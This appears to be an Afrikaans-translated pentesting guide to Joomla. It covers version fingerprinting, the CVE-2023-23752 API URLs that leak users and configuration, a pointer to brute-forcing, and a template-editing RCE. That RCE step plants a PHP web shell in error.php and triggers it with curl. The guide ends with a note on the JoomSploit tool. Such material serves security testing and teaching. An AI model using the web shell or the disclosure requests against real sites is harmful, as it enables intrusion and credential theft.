Joomla
Joomla Statistieke
Joomla verskaf 'n paar anonieme gebruik statistieke soos die verdeling van Joomla, PHP en databasis weergawes en bediener bedryfstelsels wat op Joomla installasies gebruik word. Hierdie data kan deur middel van hul openbare API opgevraag word.
Enumeration
Discovery/Footprinting
Kontroleer die meta
robots.txt
README.txt
Weergawe
In /administrator/manifests/files/joomla.xml kan jy die weergawe sien.
In /language/en-GB/en-GB.xml kan jy die weergawe van Joomla kry.
In plugins/system/cache/cache.xml kan jy 'n benaderde weergawe sien.
Outomaties
In 80,443 - Pentesting Web Metodologie is 'n afdeling oor CMS skanners wat Joomla kan skandeer.
API Ongeauthentiseerde Inligtingsontsluiting:
Weergawes Van 4.0.0 tot 4.2.7 is kwesbaar vir ongeauthentiseerde inligtingsontsluiting (CVE-2023-23752) wat kredensiale en ander inligting sal dump.
Gebruikers:
http://<host>/api/v1/users?public=true
Konfigurasie Lêer:
http://<host>/api/index.php/v1/config/application?public=true
MSF Module: scanner/http/joomla_api_improper_access_checks
of ruby skrip: 51334
Brute-Force
Jy kan hierdie skrip gebruik om te probeer om die aanmelding te brute-force.
RCE
As jy daarin slaag om admin akrediteer te verkry, kan jy RCE binne dit kry deur 'n snit van PHP kode by te voeg om RCE te verkry. Ons kan dit doen deur 'n sjabloon te pas.
Klik op
Templates
onderaan links onderConfiguration
om die sjabloonmenu op te roep.Klik op 'n sjabloon naam. Kom ons kies
protostar
onder dieTemplate
kolomkop. Dit sal ons na dieTemplates: Customise
bladsy bring.Laastens kan jy op 'n bladsy klik om die bladsybron op te roep. Kom ons kies die
error.php
bladsy. Ons sal 'n PHP een-liner byvoeg om kode-uitvoering te verkry soos volg:system($_GET['cmd']);
Stoor & Sluit
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Van XSS na RCE
JoomSploit: Joomla Exploit Script wat XSS na RCE of ander kritieke kwesbaarhede verhoog. Vir meer inligting, kyk na hierdie pos. Dit bied ondersteuning vir Joomla weergawes 5.X.X, 4.X.X, en 3.X.X, en laat toe om:
Privilegie Escalatie: Skep 'n gebruiker in Joomla.
(RCE) Ingeboude Sjablone Wysig: Wysig 'n Ingeboude Sjabloon in Joomla.
(Aangepas) Aangepaste Exploits: Aangepaste Exploits vir Derdeparty Joomla Plugins.
Last updated